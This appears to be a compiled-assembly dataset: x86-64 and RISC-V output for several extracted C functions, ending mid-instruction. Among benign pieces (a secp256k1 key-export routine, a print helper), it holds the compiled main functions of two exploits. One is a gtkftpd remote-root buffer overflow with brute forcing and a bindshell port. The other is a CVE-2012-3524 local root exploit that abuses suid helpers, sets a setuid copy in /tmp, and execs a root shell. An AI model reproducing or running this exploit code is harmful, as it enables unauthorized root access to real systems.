.zero 8 .globl writedir .align 8 .type writedir, @object .size writedir, 8 writedir: .zero 8 .globl user .align 8 .type user, @object .size user, 8 user: .zero 8 .globl sport .align 4 .type sport, @object .size sport, 4 sport: .zero 4 .globl sig_pipe .align 4 .type sig_pipe, @object .size sig_pipe, 4 sig_pipe: .zero 4 .globl sig_ctrlc .align 4 .type sig_ctrlc, @object .size sig_ctrlc, 4 sig_ctrlc: .zero 4 .globl reverse .align 4 .type reverse, @object .size reverse, 4 reverse: .zero 4 .globl port .align 4 .type port, @object .size port, 4 port: .zero 4 .globl pass .align 8 .type pass, @object .size pass, 8 pass: .zero 8 .globl optarg .align 8 .type optarg, @object .size optarg, 8 optarg: .zero 8 .globl no_io .align 4 .type no_io, @object .size no_io, 4 no_io: .zero 4 .globl host .align 8 .type host, @object .size host, 8 host: .zero 8 .globl columns .align 4 .type columns, @object .size columns, 4 columns: .zero 4 .globl baseaddr .align 4 .type baseaddr, @object .size baseaddr, 4 baseaddr: .zero 4 .globl attempts .align 4 .type attempts, @object .size attempts, 4 attempts: .zero 4 .globl align .align 4 .type align, @object .size align, 4 align: .zero 4 .globl SIGPIPE .align 4 .type SIGPIPE, @object .size SIGPIPE, 4 SIGPIPE: .zero 4 .globl SIGINT .align 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .globl EOF .align 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .globl DFLUSER .align 8 .type DFLUSER, @object .size DFLUSER, 8 DFLUSER: .zero 8 .globl DFLPASS .align 8 .type DFLPASS, @object .size DFLPASS, 8 DFLPASS: .zero 8 .globl DFLDIR .align 8 .type DFLDIR, @object .size DFLDIR, 8 DFLDIR: .zero 8 .globl DFLCLM .align 4 .type DFLCLM, @object .size DFLCLM, 4 DFLCLM: .zero 4 .globl DFLADDR .align 4 .type DFLADDR, @object .size DFLADDR, 4 DFLADDR: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_88.c_main_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "downward" .align 3 .LC1: .string "upward" .align 3 .LC2: .string "[*] gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .align 3 .LC3: .string "COLUMNS" .align 3 .LC4: .string "main(): allocating memory failed." .align 3 .LC5: .string "%x" .align 3 .LC6: .string "h:P:s:u:p:c:b:a:n:rd" .align 3 .LC7: .string "[!] shell port defined contains null byte(s), using default." .align 3 .LC8: .string "[*] target: %s:%d, identity: %s:%s.\n[*] directory: %s, brute start: 0x%.8x, alignment: %d.\n[*] memory direction: %s, attempts: %d, bindshell port: %d.\n\n" .align 3 .LC9: .string "brute force exhausted, failed." .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-128 sd s1,104(sp) mv s1,a0 lla a0,.LC2 sd ra,120(sp) sd s0,112(sp) sd s9,40(sp) mv s0,a1 sd s2,96(sp) sd s3,88(sp) sd s4,80(sp) sd s5,72(sp) sd s6,64(sp) sd s7,56(sp) sd s8,48(sp) call puts@plt lla a0,.LC3 call getenv@plt lla s9,.LANCHOR0 bne a0,zero,.L50 .L2: lla s3,.LC6 li s4,37 lla s2,.L6 li s5,1 lla s7,.LANCHOR0+56 lla s6,.LC5 lla s8,.LC4 .L3: mv a2,s3 mv a1,s0 mv a0,s1 call getopt@plt lw a5,76(s9) beq a5,a0,.L51 .L21: addiw a0,a0,-80 sext.w a5,a0 bgtu a5,s4,.L4 slli a5,a0,32 srli a0,a5,30 add a0,a0,s2 lw a5,0(a0) add a5,a5,s2 jr a5 .section .rodata .align 2 .align 2 .L6: .word .L16-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L15-.L6 .word .L14-.L6 .word .L13-.L6 .word .L12-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L11-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L4-.L6 .word .L10-.L6 .word .L4-.L6 .word .L9-.L6 .word .L4-.L6 .word .L8-.L6 .word .L7-.L6 .word .L4-.L6 .word .L5-.L6 .section .text.startup .L4: ld a0,0(s0) call usage@plt mv a2,s3 mv a1,s0 mv a0,s1 call getopt@plt lw a5,76(s9) bne a5,a0,.L21 .L51: ld a5,8(s9) beq a5,zero,.L52 .L22: ld a5,32(s9) beq a5,zero,.L53 .L23: ld a5,40(s9) beq a5,zero,.L54 .L24: ld a5,48(s9) beq a5,zero,.L55 .L25: lw a5,56(s9) bne a5,zero,.L26 lw a5,104(s9) sw a5,56(s9) .L26: lw a4,60(s9) li a5,3 ble a4,a5,.L27 li a5,2 sw a5,60(s9) .L27: lw a4,28(s9) sraiw a5,a4,8 andi a5,a5,0xff beq a5,zero,.L28 andi a4,a4,0xff beq a4,zero,.L28 .L29: lw a0,28(s9) ld a4,112(s9) lw t3,68(s9) sraiw a5,a0,8 andi a5,a5,255 andi a3,a0,255 sw a5,80(a4) sw a3,84(a4) ld a1,8(s9) lw a2,24(s9) ld a3,32(s9) ld a4,40(s9) ld a5,48(s9) lw a6,56(s9) lw a7,60(s9) lla t1,.LC0 beq t3,zero,.L30 lla t1,.LC1 .L30: lw t3,64(s9) sd t1,0(sp) sd a0,16(sp) sd t3,8(sp) lla a0,.LC8 call printf@plt lw a1,120(s9) lw a0,124(s9) call signal@plt lw a1,128(s9) lw a0,132(s9) call signal@plt call ftp_connect@plt li a1,0 lla a0,.LC9 call printe@plt li a0,0 call exit@plt ld ra,120(sp) ld s0,112(sp) ld s1,104(sp) ld s2,96(sp) ld s3,88(sp) ld s4,80(sp) ld s5,72(sp) ld s6,64(sp) ld s7,56(sp) ld s8,48(sp) ld s9,40(sp) li a0,0 addi sp,sp,128 jr ra .L5: ld a5,32(s9) bne a5,zero,.L3 ld a0,16(s9) call strdup@plt sd a0,32(s9) bne a0,zero,.L3 .L20: li a1,1 mv a0,s8 call printe@plt j .L3 .L7: ld a0,16(s9) call atoi@plt sw a0,28(s9) j .L3 .L8: sw s5,68(s9) j .L3 .L9: ld a5,40(s9) bne a5,zero,.L3 ld a0,16(s9) call strdup@plt sd a0,40(s9) bne a0,zero,.L3 j .L20 .L10: ld a0,16(s9) call atoi@plt sw a0,64(s9) j .L3 .L11: ld a5,8(s9) bne a5,zero,.L3 ld a0,16(s9) call strdup@plt sd a0,8(s9) bne a0,zero,.L3 j .L20 .L12: sw s5,72(s9) j .L3 .L13: ld a5,48(s9) bne a5,zero,.L3 ld a0,16(s9) call strdup@plt sd a0,48(s9) bne a0,zero,.L3 j .L20 .L14: ld a0,16(s9) mv a2,s7 mv a1,s6 call sscanf@plt j .L3 .L15: ld a0,16(s9) call atoi@plt sw a0,60(s9) j .L3 .L16: ld a0,16(s9) call atoi@plt sw a0,24(s9) j .L3 .L28: lla a0,.LC7 call puts@plt li a5,8192 addi a5,a5,-213 sw a5,28(s9) j .L29 .L50: lla a0,.LC3 call getenv@plt call atoi@plt sw a0,0(s9) j .L2 .L55: ld a5,96(s9) sd a5,48(s9) j .L25 .L54: ld a5,88(s9) sd a5,40(s9) j .L24 .L53: ld a5,80(s9) sd a5,32(s9) j .L23 .L52: ld a0,0(s0) call usage@plt j .L22 .size main, .-main .globl x86_exec .globl writedir .globl user .globl sport .globl sig_pipe .globl sig_ctrlc .globl reverse .globl port .globl pass .globl optarg .globl no_io .globl host .globl columns .globl baseaddr .globl attempts .globl align .globl SIGPIPE .globl SIGINT .globl EOF .globl DFLUSER .globl DFLPASS .globl DFLDIR .globl DFLCLM .globl DFLADDR .bss .align 3 .set .LANCHOR0,. + 0 .type columns, @object .size columns, 4 columns: .zero 4 .zero 4 .type host, @object .size host, 8 host: .zero 8 .type optarg, @object .size optarg, 8 optarg: .zero 8 .type port, @object .size port, 4 port: .zero 4 .type sport, @object .size sport, 4 sport: .zero 4 .type user, @object .size user, 8 user: .zero 8 .type pass, @object .size pass, 8 pass: .zero 8 .type writedir, @object .size writedir, 8 writedir: .zero 8 .type baseaddr, @object .size baseaddr, 4 baseaddr: .zero 4 .type align, @object .size align, 4 align: .zero 4 .type attempts, @object .size attempts, 4 attempts: .zero 4 .type reverse, @object .size reverse, 4 reverse: .zero 4 .type no_io, @object .size no_io, 4 no_io: .zero 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .type DFLUSER, @object .size DFLUSER, 8 DFLUSER: .zero 8 .type DFLPASS, @object .size DFLPASS, 8 DFLPASS: .zero 8 .type DFLDIR, @object .size DFLDIR, 8 DFLDIR: .zero 8 .type DFLADDR, @object .size DFLADDR, 4 DFLADDR: .zero 4 .zero 4 .type x86_exec, @object .size x86_exec, 8 x86_exec: .zero 8 .type sig_ctrlc, @object .size sig_ctrlc, 4 sig_ctrlc: .zero 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .type sig_pipe, @object .size sig_pipe, 4 sig_pipe: .zero 4 .type SIGPIPE, @object .size SIGPIPE, 4 SIGPIPE: .zero 4 .type DFLCLM, @object .size DFLCLM, 4 DFLCLM: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_5
.file "extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_5.c" .text .p2align 4 .globl ec_privkey_export_der .type ec_privkey_export_der, @function ec_privkey_export_der: .LFB24: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rcx, %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rdx, %r12 movq %rcx, %rdx pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %r8d, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $40, %rsp .cfi_def_cfa_offset 96 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax leaq 12(%rsp), %r14 movq $0, 16(%rsp) movq %r14, %rsi call secp256k1_ec_pubkey_create@PLT xorl %edx, %edx testl %eax, %eax je .L2 testl %ebp, %ebp jne .L10 movl $9, %edx leaq begin.1(%rip), %rsi movq %rbx, %rdi call memcpy@PLT leaq 9(%rbx), %rdi movq %r15, %rsi movl $32, %edx call memcpy@PLT movl $173, %edx leaq 41(%rbx), %rdi leaq middle.0(%rip), %rsi call memcpy@PLT movl SECP256K1_EC_UNCOMPRESSED(%rip), %r8d leaq 16(%rsp), %rdx movq $65, 16(%rsp) leaq 214(%rbx), %rbp .L8: movq %r14, %rcx movq %rbp, %rsi movq %r13, %rdi call secp256k1_ec_pubkey_serialize@PLT movq 16(%rsp), %rdx movl $1, %eax addq %rbp, %rdx subq %rbx, %rdx .L2: movq %rdx, (%r12) movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L11 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L10: .cfi_restore_state movl $8, %edx leaq begin.3(%rip), %rsi movq %rbx, %rdi call memcpy@PLT leaq 8(%rbx), %rdi movq %r15, %rsi movl $32, %edx call memcpy@PLT movl $141, %edx leaq 40(%rbx), %rdi leaq middle.2(%rip), %rsi call memcpy@PLT leaq 181(%rbx), %rbp leaq 16(%rsp), %rdx movq $33, 16(%rsp) movl SECP256K1_EC_COMPRESSED(%rip), %r8d jmp .L8 .L11: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size ec_privkey_export_der, .-ec_privkey_export_der .section .rodata .align 32 .type middle.0, @object .size middle.0, 173 middle.0: .string "\240\201\2450\201\242\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004A\004y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230H:\332w&\243\304e]\244\373\374\016\021\b\250\375\027\264H\246\205T\031\234G\320\217\373\020\324\270\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241D\003B" .align 8 .type begin.1, @object .size begin.1, 9 begin.1: .ascii "0\202\001\023\002\001\001\004 " .align 32 .type middle.2, @object .size middle.2, 141 middle.2: .string "\240\201\2050\201\202\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004!\002y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241$\003\"" .align 8 .type begin.3, @object .size begin.3, 8 begin.3: .ascii "0\201\323\002\001\001\004 " .globl SECP256K1_EC_UNCOMPRESSED .bss .align 4 .type SECP256K1_EC_UNCOMPRESSED, @object .size SECP256K1_EC_UNCOMPRESSED, 4 SECP256K1_EC_UNCOMPRESSED: .zero 4 .globl SECP256K1_EC_COMPRESSED .align 4 .type SECP256K1_EC_COMPRESSED, @object .size SECP256K1_EC_COMPRESSED, 4 SECP256K1_EC_COMPRESSED: .zero 4 .globl g_aug_volatile_7704 .data .align 4 .type g_aug_volatile_7704, @object .size g_aug_volatile_7704, 4 g_aug_volatile_7704: .long 5 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_lax_der_privatekey_parsing.c_ec_privkey_export_der_aug_v3_5.c" .option pic .text .align 1 .globl ec_privkey_export_der .type ec_privkey_export_der, @function ec_privkey_export_der: addi sp,sp,-96 sd s4,48(sp) sd s6,32(sp) la s4,__stack_chk_guard addi s6,sp,12 sd s0,80(sp) sd s2,64(sp) ld a5, 0(s4) sd a5, 24(sp) li a5, 0 mv s0,a1 mv s2,a2 mv a1,s6 mv a2,a3 sd s1,72(sp) sd s3,56(sp) sd s5,40(sp) sd ra,88(sp) mv s1,a3 mv s3,a0 mv s5,a4 sd zero,16(sp) call secp256k1_ec_pubkey_create@plt li a5,0 beq a0,zero,.L2 bne s5,zero,.L10 li a2,9 lla a1,.LANCHOR0+152 mv a0,s0 call memcpy@plt mv a1,s1 li a2,32 addi a0,s0,9 call memcpy@plt li a2,173 lla a1,.LANCHOR0+168 addi a0,s0,41 call memcpy@plt addi s1,s0,214 lw a4,.LANCHOR1+4 mv a3,s6 addi a2,sp,16 mv a1,s1 mv a0,s3 li a5,65 .L8: sd a5,16(sp) call secp256k1_ec_pubkey_serialize@plt ld a5,16(sp) li a0,1 add a5,s1,a5 sub a5,a5,s0 .L2: sd a5,0(s2) ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L11 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) addi sp,sp,96 jr ra .L10: li a2,8 lla a1,.LANCHOR0 mv a0,s0 call memcpy@plt mv a1,s1 li a2,32 addi a0,s0,8 call memcpy@plt li a2,141 lla a1,.LANCHOR0+8 addi a0,s0,40 call memcpy@plt addi s1,s0,181 lw a4,.LANCHOR1 mv a3,s6 addi a2,sp,16 mv a1,s1 mv a0,s3 li a5,33 j .L8 .L11: call __stack_chk_fail@plt .size ec_privkey_export_der, .-ec_privkey_export_der .globl SECP256K1_EC_UNCOMPRESSED .globl SECP256K1_EC_COMPRESSED .globl g_aug_volatile_7704 .section .rodata .align 3 .set .LANCHOR0,. + 0 .type begin.3, @object .size begin.3, 8 begin.3: .ascii "0\201\323\002\001\001\004 " .type middle.2, @object .size middle.2, 141 middle.2: .string "\240\201\2050\201\202\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004!\002y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241$\003\"" .zero 3 .type begin.1, @object .size begin.1, 9 begin.1: .ascii "0\202\001\023\002\001\001\004 " .zero 7 .type middle.0, @object .size middle.0, 173 middle.0: .string "\240\201\2450\201\242\002\001\0010,\006\007*\206H\316=\001\001\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\377\377\374/0\006\004\001" .string "\004\001\007\004A\004y\276f~\371\334\273\254U\240b\225\316\207\013\007\002\233\374\333-\316(\331Y\362\201[\026\370\027\230H:\332w&\243\304e]\244\373\374\016\021\b\250\375\027\264H\246\205T\031\234G\320\217\373\020\324\270\002!" .string "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\376\272\256\334\346\257H\240;\277\322^\214\3206AA\002\001\001\241D\003B" .data .align 2 .type g_aug_volatile_7704, @object .size g_aug_volatile_7704, 4 g_aug_volatile_7704: .word 5 .bss .align 2 .set .LANCHOR1,. + 0 .type SECP256K1_EC_COMPRESSED, @object .size SECP256K1_EC_COMPRESSED, 4 SECP256K1_EC_COMPRESSED: .zero 4 .type SECP256K1_EC_UNCOMPRESSED, @object .size SECP256K1_EC_UNCOMPRESSED, 4 SECP256K1_EC_UNCOMPRESSED: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_11315.c_print_aug_v3_7
.file "extr_11315.c_print_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*]%s\n" .text .p2align 4 .globl print .type print, @function print: .LFB1: .cfi_startproc endbr64 movq %rdi, %rsi leaq .LC0(%rip), %rdi jmp printf@PLT .cfi_endproc .LFE1: .size print, .-print .globl g_aug_volatile_9923 .data .align 4 .type g_aug_volatile_9923, @object .size g_aug_volatile_9923, 4 g_aug_volatile_9923: .long 10 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_11315.c_print_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*]%s\n" .text .align 1 .globl print .type print, @function print: mv a1,a0 lla a0,.LC0 tail printf@plt .size print, .-print .globl g_aug_volatile_9923 .data .align 2 .type g_aug_volatile_9923, @object .size g_aug_volatile_9923, 4 g_aug_volatile_9923: .word 10 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_21323.c_main_aug_v3_2
.file "extr_21323.c_main_aug_v3_2.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "DBUS_STARTER_BUS_TYPE=system" .section .rodata.str1.8 .align 8 .LC2: .string "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:" .section .rodata.str1.1 .LC3: .string "/bin/su" .LC4: .string "blah" .section .rodata.str1.8 .align 8 .LC5: .string "/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper" .section .rodata.str1.1 .LC6: .string "/usr/bin/Xorg" .LC7: .string ":7350" .LC8: .string "/bin/bash" .LC9: .string "--noprofile" .LC10: .string "--norc" .LC11: .string "/tmp/dbus-launch" .section .rodata.str1.8 .align 8 .LC12: .string "[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n" .section .rodata.str1.1 .LC13: .string "/proc/self/exe" .LC14: .string "/proc/self/path/a.out" .LC15: .string "[+] Using spice helper ...\n" .section .rodata.str1.8 .align 8 .LC16: .string "/lib64/security/pam_systemd.so" .align 8 .LC17: .string "[+] Using pam_systemd helper (type user passwd when asked) ...\n" .section .rodata.str1.1 .LC18: .string "DISPLAY=:7350" .LC19: .string "USER" .LC20: .string "[+] Using Xorg helper ...\n" .section .rodata.str1.8 .align 8 .LC21: .string "[-] No suitable suid helper found.\n" .align 8 .LC22: .string "[*] Waiting 10s for dbus-launch to drop boomshell.\n" .section .rodata.str1.1 .LC23: .string "." .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 pushq %rbx .cfi_def_cfa_offset 32 .cfi_offset 3, -32 subq $4096, %rsp .cfi_def_cfa_offset 4128 orq $0, (%rsp) subq $192, %rsp .cfi_def_cfa_offset 4320 movq %fs:40, %rax movq %rax, 4280(%rsp) movl g_aug_volatile_4145(%rip), %eax movl %edi, %ebx movq $0, 152(%rsp) movq $0, 160(%rsp) movq $0, 72(%rsp) movq $0, 88(%rsp) movq $0, 24(%rsp) movq $0, 48(%rsp) movq $0, 120(%rsp) addl $1, %eax movl %eax, g_aug_volatile_4145(%rip) leaq .LC0(%rip), %rax movq %rax, 128(%rsp) leaq .LC1(%rip), %rax movq %rax, 136(%rsp) leaq .LC2(%rip), %rax movq %rax, 144(%rsp) leaq .LC3(%rip), %rax movq %rax, 64(%rsp) leaq .LC4(%rip), %rax movq %rax, 80(%rsp) leaq .LC5(%rip), %rax movq %rax, 16(%rsp) leaq .LC6(%rip), %rax movq %rax, 32(%rsp) leaq .LC7(%rip), %rax movq %rax, 40(%rsp) leaq .LC8(%rip), %rax movq %rax, 96(%rsp) leaq .LC9(%rip), %rax movq %rax, 104(%rsp) leaq .LC10(%rip), %rax movq %rax, 112(%rsp) xorl %eax, %eax call geteuid@PLT cmpl $1, %ebx jle .L2 testq %rax, %rax je .L27 .L2: xorl %eax, %eax leaq .LC11(%rip), %r12 call geteuid@PLT testq %rax, %rax je .L28 .L3: leaq .LC12(%rip), %rdi leaq 176(%rsp), %rbp call printf@PLT xorl %esi, %esi movl $4096, %edx movq %rbp, %rdi call memset@PLT movl $4095, %edx movq %rbp, %rsi leaq .LC13(%rip), %rdi call readlink@PLT testq %rax, %rax js .L29 .L4: movq %rbp, %rdi movq %r12, %rsi leaq 12(%rsp), %rbp call symlink@PLT movq 16(%rsp), %rdi movq %rbp, %rsi call stat@PLT testq %rax, %rax jne .L5 leaq 32(%rsp), %rbx testb $8, 13(%rsp) jne .L30 .L6: call fork@PLT testl %eax, %eax je .L31 .L9: leaq .LC22(%rip), %rdi leaq .LC23(%rip), %rbx call printf@PLT .p2align 4,,10 .p2align 3 .L10: movl $1, %edi call sleep@PLT movq %rbx, %rdi call printf@PLT movl stdout(%rip), %edi call fflush@PLT jmp .L10 .L27: leaq .LC11(%rip), %r12 xorl %edx, %edx xorl %esi, %esi movq %r12, %rdi call chown@PLT movq %r12, %rdi movl $2541, %esi call chmod@PLT movl errno(%rip), %edi call exit@PLT jmp .L3 .L31: movq (%rbx), %rdi leaq 128(%rsp), %rdx movq %rbx, %rsi call execve@PLT xorl %edi, %edi call exit@PLT jmp .L9 .L5: movq %rbp, %rsi leaq .LC16(%rip), %rdi call stat@PLT testq %rax, %rax je .L32 movq 32(%rsp), %rdi movq %rbp, %rsi call stat@PLT testq %rax, %rax jne .L8 testb $8, 13(%rsp) je .L8 leaq .LC20(%rip), %rdi leaq 32(%rsp), %rbx call printf@PLT jmp .L6 .L29: movl $4095, %edx movq %rbp, %rsi leaq .LC14(%rip), %rdi call readlink@PLT jmp .L4 .L30: leaq .LC15(%rip), %rdi leaq 16(%rsp), %rbx call printf@PLT jmp .L6 .L32: leaq .LC17(%rip), %rdi leaq 64(%rsp), %rbx call printf@PLT leaq .LC18(%rip), %rax leaq .LC19(%rip), %rdi movq %rax, 152(%rsp) call getenv@PLT movq %rax, 72(%rsp) jmp .L6 .L8: leaq .LC21(%rip), %rdi leaq 32(%rsp), %rbx call printf@PLT xorl %edi, %edi call exit@PLT jmp .L6 .L28: xorl %edi, %edi call setuid@PLT movq 96(%rsp), %rdi leaq 96(%rsp), %rsi xorl %edx, %edx call execve@PLT movl errno(%rip), %eax movq 4280(%rsp), %rdx subq %fs:40, %rdx jne .L33 addq $4288, %rsp .cfi_remember_state .cfi_def_cfa_offset 32 popq %rbx .cfi_def_cfa_offset 24 popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .L33: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl errno .align 4 .type errno, @object .size errno, 4 errno: .zero 4 .globl SIGKILL .align 4 .type SIGKILL, @object .size SIGKILL, 4 SIGKILL: .zero 4 .globl g_aug_volatile_4145 .data .align 4 .type g_aug_volatile_4145, @object .size g_aug_volatile_4145, 4 g_aug_volatile_4145: .long 3 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_21323.c_main_aug_v3_2.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC4: .string "/bin/su" .align 3 .LC5: .string "blah" .align 3 .LC12: .string "/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper" .align 3 .LC13: .string "/usr/bin/Xorg" .align 3 .LC14: .string ":7350" .align 3 .LC7: .string "/bin/bash" .align 3 .LC8: .string "--noprofile" .align 3 .LC9: .string "--norc" .align 3 .LC15: .string "/tmp/dbus-launch" .align 3 .LC16: .string "[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n" .align 3 .LC17: .string "/proc/self/exe" .align 3 .LC18: .string "/proc/self/path/a.out" .align 3 .LC19: .string "[+] Using spice helper ...\n" .align 3 .LC20: .string "/lib64/security/pam_systemd.so" .align 3 .LC21: .string "[+] Using pam_systemd helper (type user passwd when asked) ...\n" .align 3 .LC22: .string "DISPLAY=:7350" .align 3 .LC23: .string "USER" .align 3 .LC24: .string "[+] Using Xorg helper ...\n" .align 3 .LC25: .string "[-] No suitable suid helper found.\n" .align 3 .LC26: .string "[*] Waiting 10s for dbus-launch to drop boomshell.\n" .align 3 .LC27: .string "." .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-208 sd s0,192(sp) li t0,-4096 li s0,4096 sd s1,184(sp) sd ra,200(sp) sd s2,176(sp) sd s3,168(sp) addi a3,s0,152 add sp,sp,t0 add a3,a3,sp la s1,__stack_chk_guard ld a5, 0(s1) sd a5, 0(a3) li a5, 0 lw a3,.LANCHOR0 li a5,-4096 addi s0,s0,160 lla a4,.LANCHOR0 add s0,s0,a5 addiw a3,a3,1 add a5,s0,sp ld t1,8(a4) ld a7,16(a4) ld a6,24(a4) ld a1,32(a4) ld a2,40(a4) sw a3,0(a4) lla a4,.LC4 sd a4,-112(a5) lla a4,.LC5 sd a4,-96(a5) lla a4,.LC12 sd a4,-152(a5) lla a4,.LC13 sd a4,-136(a5) lla a4,.LC14 sd a4,-128(a5) lla a4,.LC7 sd a4,-80(a5) lla a4,.LC8 sd a4,-72(a5) lla a4,.LC9 sd zero,-104(a5) sd zero,-88(a5) sd zero,-144(a5) sd zero,-120(a5) sd a4,-64(a5) sd zero,-56(a5) mv s0,a0 sd t1,-48(a5) sd a7,-40(a5) sd a6,-32(a5) sd a1,-24(a5) sd a2,-16(a5) call geteuid@plt bne a0,zero,.L2 li a5,1 bgt s0,a5,.L20 .L2: call geteuid@plt lla s0,.LANCHOR1 beq a0,zero,.L21 .L3: lla a0,.LC16 call printf@plt li s1,-4096 li a5,4096 addi s1,s1,-8 addi a5,a5,160 add a5,a5,s1 add s1,a5,sp li a2,4096 li a1,0 mv a0,s1 call memset@plt li s2,4096 addi a2,s2,-1 mv 